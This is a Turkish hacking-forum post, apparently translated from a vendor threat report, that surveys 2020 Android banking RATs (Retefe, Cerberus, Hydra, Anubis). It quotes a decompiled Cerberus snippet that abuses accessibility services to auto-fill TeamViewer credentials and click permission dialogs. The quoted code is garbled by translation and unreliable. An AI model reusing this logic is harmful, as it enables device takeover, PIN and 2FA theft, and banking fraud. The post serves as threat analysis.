RAT'ın Yılı 2020 // Xowly

Xowly

Katılımcı Üye
17 Haz 2019
769
57
ғate
Merhabalar, değerli Türk Hack Team ailesi bu gün sizlere "Rat'ın Yılı" konusunu anlatacağım.
Önemli olan başlıkları inceleyelim.


beUGIW.png


RAT ve Mobil Bankacılık

c7S383.png

Çoğu uzman ve şirkete göre 2020 yılı rat'ın yılıdır. Rat son yıllarda analistlere göre mobil bankacılıkta truva atlarının gözlemlendiği bir
kaynak olmaya başlamıştır. Kötü amaçlı yazılımlarda RAT terimi

"Uzaktan Erişim Truva Atı" olarak kullanılmaktadır. Bu nedenle bu çeşit virüslü cihaz ile saldırgan bağlantısı olarak uzaktan kontrol sağlayabilir. Aynı zamanda bu nedenden kötü amaçlı yazılımlar kategorisine girmektedir. Uzaktan erişim, bu yöntem ile SSH veya

RDP (Uzak Masaüstü Protokolü) gibi yerel hizmetler hatta TeamViewer, VNC veya RAdmin gibi yazılımlar kullanılarak farklı yollarla elde edilebilir.

IcV6zC.png

Aynı zamanda bu kontrol çeşitinin temel olarak kötü olmadığını, kullanıcılara destek sağlama gibi amaçlarlada kullanılabilmektedir.

Bazen kötü niyetli saldırganlar kendi kod veya yazılımlarını geliştirerek belirli denetlemelerden kaçmayı amaçlarlar.

Tarihte ilk olarak bu tür yöntemler mobil bankacılıkta kötü amaçlı yazılımlarla bilgileri elde etmek veya suistimal etmek için kullanılmıştır.

Fakat bankacılıkta güvenliklerin ve yazılım tespitlerinin gelişmesiyle saldırganlar için bu durum gittikçe zorlaşmaya başladı.



yGIx65.png



Bunun ardından saldırganlarda kurbanın cihazını kandırarak tespit mekanizmalarını atlatmak için yöntemler ortaya çıkarmıştır. Fakat önemli olan kurbanın cihazının şifreleme kombinasyonunun
back-connect proxy ile parmak izinin atlatılarak saldırganın gerçek olan kullanıcı gibi gösterilmesidir.

Parmak izi yöntemlerinin kandırılması gibi çözümler bu tür tekniklerin tespit edilmesine olanak sağladı, bu nedenle saldırganlar tekrar yöntemlerde yenilik yapmak zorunluluğunda kaldılar.

Bu durumda ratlar, kurban cihazdan doğrudan bağlantı olanağı sunmaktadır. Bunu yaparak, suçlular, istemci tabanlı bir algılama çözümü olmadan hileli işlemleri tespit etmeyi önemli ölçüde zorlaştırıyor.

CAHP0b.png

Aynı zamanda 2016 yılında karşımıza "Retefe" çıktı. Retefe ile beraber saldırganlar nerdeyse TeamWiewer uygulamasını kötüye kullanarak cihazlar
üzerinde tam yetkiyi elde etti. Daha sonrasında Retefe kötü amaçlı bazı saldırganlar

tarafından yeniden android cihazlara karşı kullanılmaya başlandı. Kısacası kötü amaçlı bu tür yazılımlara karşı çıkan tespit ve kontrol
sistemlerine karşın kötü amaçlı yazılımlarda (Rat gibi) evrimleşme yaşadı.



Cerberus

Diğer kullanımlar enfekte cihazlardan kişisel olarak bilgilerin başarılı bir şekilde çıkarılmasını sağlayan bir
özellik seti sunarken, Cerberus hala çalınan bilgi ve

sahtekarlığın kötüye kullanımı sırasında algılama bariyerini düşürmeye yardımcı olabilecek özelliklerden yoksundu.

2020 Ocak ayı sıralarında Cerberus denetmenleri bu sorunu çözmek amacıyla yeni bir yöntemle geldi. Bu yöntem kod tabanının yeniden

düzenlenmesine ve C2 iletişim protokolünün güncellemelerine tabi tutuldu,

Ancak en önemlisi, rat özelliği, cihaz ekran kilidi kimlik bilgilerini (PIN kodu veya kaydırma deseni) ve 2fa jetonlarını çalma imkanı ile oluşturdu.

TeamViewer oturum açma ve başlatma sorumlu kodu:**

Kod:
String runningPackage = this.lowerPkgName;

if (getNodeFromEvent.contains ("com.teamviewer.host.market")) {

*** AccessibilityNodeInfo kullanıcı adı = AcccesibilityUtils.getNodeFromEvent (event, 
"com.teamviewer.host.market:id/host_assign_device_username");
*** AccessibilityNodeInfo password = AcccesibilityUtils.getNodeFromEvent (event, "com.teamviewer.host.market:id/host_assign_device_password");
*** AccessibilityNodeInfo send = AcccesibilityUtils.getNodeFromEvent (event, "com.teamviewer.host.market:id/host_assign_device_submit_button");
*** if (kullanıcı adı! = null) {
******* this.teamviewerUsername = this.utils.readShPrStr (this, this.strings.connect_teamviewer);
******* if (! this.teamviewerUsername.isEmpty ()) {
*********** this.teamviewerPassord = this.utils.readShPrStr (this, this.strings.password);
*********** this.credsSubitted = yanlış;
*********** this.passwordFilled = yanlış;
*********** this.userFilled = yanlış;
*********** this.permissionStatus = 0;
*********** this.utils.writeShPrStr (this, this.strings.connect_teamviewer, "");
*********** this.utils.writeShPrStr (this, this.strings.password, "");
******* }

}

Kod:
}

*** if (this.permissionStatus == 0) {
******* AccessibilityNodeInfo v7_7 = AcccesibilityUtils.getNodeFromEvent (event, "com.teamviewer.host.market:id/action_bar_root");
******* if (v7_7! = null && AcccesibilityUtils.getNodeFromEvent (event, "com.teamviewer.host.market:id/buttonPanel")! = null) {
*********** this.permissionStatus = 1;
*********** AccessibilityNodeInfo tmButton = AcccesibilityUtils.getNodeFromEvent (event, "
*********** if (tmButton! = null) {
*************** this.acc_utils.clickButton (tmButton);
*********** }

*********** AccessibilityNodeInfo klmCheckBox = AcccesibilityUtils.getNodeFromEvent (event, "com.samsung.klmsagent: id / checkBox1");
*********** AccessibilityNodeInfo klmConfirm = AcccesibilityUtils.getNodeFromEvent (event, "com.samsung.klmsagent: id / btn_confirm");
*********** if (klmCheckBox! = null && this.permissionStatus == 1) {
*************** this.acc_utils.clickButton (klmCheckBox);
*************** this.acc_utils.clickButton (klmConfirm);
*************** this.permissionStatus = 2;
*************** Utils utils = this.utils;
*************** utils.launchPkg (bu, "com.teamviewer.host.market");
*********** }
******* }
*** }

*** if (! this.teamviewerUsername.isEmpty () &&! this.teamviewerPassord.isEmpty ()) {
******* if (kullanıcı adı! = null &&! this.userFilled) {
*********** this.acc_utils.setInput (kullanıcı adı, this.teamviewerUsername);
*********** this.userFilled = true;
******* }

******* if (şifre! = boş &&! this.passwordFilled) {
*********** this.acc_utils.setInput (şifre, this.teamviewerPassord);
*********** this.passwordFilled = true;
******* }

******* if ((this.userFilled) && (this.passwordFilled) &&! this.credsSubended) {
*********** this.permissionStatus = 0;
*********** this.acc_utils.clickButton (gönderme);
*********** this.credsSubended = true;
*********** Dize v0_9 = this.utils.readShPrStr (this, this.strings.hidden);
*********** if (v0_9.equals ("true")) {
*************** this.goBack ();
*********** }
******* }
*** }


Cihazın ekran kilidi kimlik bilgilerinin (PIN ve kilit deseni) çalınmasını sağlayan özellik, kurbanın cihazın kilidini açmasını gerektiren basit bir kaplama ile güçlendirilmiştir.*

Bu ekran kilidi kimlik bilgisi hırsızlığının, oyuncuların kurbanı kullanmadığı zamanlarda sahtekarlık yapmak için cihazın uzaktan kilidini açabilmesi için inşa edildiği sonucuna varabiliriz.

Başarılı olmak için doğru araçları oluşturmak için suçluların yaratıcılığını bir kez daha göstermektedir. Erişilebilirlik ayrıcalıklarını kötüye kullanan Trojan, artık Google Şifrematik uygulamasından 2FA kodları çalabilir.

Uygulama çalışırken, Trojan arayüzün içeriğini alabilir ve C2 sunucusuna gönderebilir. Bir kez daha, bu işlevselliğin OTP kodlarına dayanan kimlik doğrulama hizmetlerini atlamak için kullanılacağını söyleyebiliriz.​


Hydra


Root yetkilendirmelerini bir “dropper hizmetleri” olarak gören Hydra, eski saldırı tekniklerini kullanmaktan tamamen kötü amaçlı yazılımına kadar uzun bir yol kat etti. Hala böyle bir kabiliyete sahip olmasına

Rağmen, Şubat 2019'dan itibaren Hydra artık dropper olarak değil, fonksiyonel ve bağımsız bir bankacılık Truva atı olarak kullanılıyor.

Oyuncuların cihazda olup bitenleri gerçek zamanlı olarak görselleştirmelerini sağlayan screencast yetenekleri (Anubis Trojan gibi), aynı zamanda geri bağlanan bir proxy seçeneği ile aktörlerin

virüslü cihazı taklit etmesini ve dolandırıcılık yapmak için kullanmasını sağlar. Diğer bazı özellikler arasında uzaktan uygulama yükleme, uzaktan ekran kilitleme ve Google firebase'i komut işleyici olarak kullanma olasılığı bulunur.

Aşağıdaki ekran görüntüleri, Türkiye'de faaliyet gösteren bankalara karşı kullanılan bazı kaplamaları göstermektedir:



VKL5PC.png




Anibus

Artık resmi olarak desteklenmese de Anubis, Android bankacılık kötü amaçlı yazılımları konusunda hala yaygın bir suçlu seçimi. Hem istemci hem de sunucu kaynak

Kodu ücretsiz olarak herkesin erişimine açık olduğundan, bu bir sürpriz olarak gelmez. Bazı yeni kullanıcılar, değişiklikleri düzeltti, hataları düzeltti ve Truva'nın bazı yönlerini yeraltı forumlarında satmak veya kiralamak için yavaş yavaş geliştirdi.

Bazı Anubis kampanyalarında bazı değişiklikler gözlenmiş olmasına rağmen, bu ikincil satıcılar tarafından önemli bir değişiklik yapılmamıştır. Değişikliklerin çoğu ya bilinen sorunların düzeltilmesi ya da mevcut özelliklerin

İyileştirilmesidir (Google Play Protect'in otomatik olarak devre dışı bırakılması gibi). Ocak 2020'de, bazı yeraltı forumlarında, bir RAT özelliği vaat eden Anubis 2.5'in değiştirilmiş bir sürümünü sunan yeni bir satış yazısı ortaya çıktı:



WBG0NV.png



Çözümlerimiz

Tespit çözümüm - CSD , finansal kuruluşlara çevrimiçi ve ilgili cihazlarının risk durumu hakkında gerçek zamanlı tespit ve gösterim imkanı sunmaktadır.
Bu tespit ve gösterim imkanı tehditlere karşı harekete geçmek için gerekli tüm bilgileri içerir.



AbRVB6.png



Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler.


0J77WL.png
 
Moderatör tarafında düzenlendi:

PourLa

Uzman üye
27 Mar 2016
1,659
30
Ellerin sağlık güncel hayattakı konuya parmak basman çok güzel olmuş
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.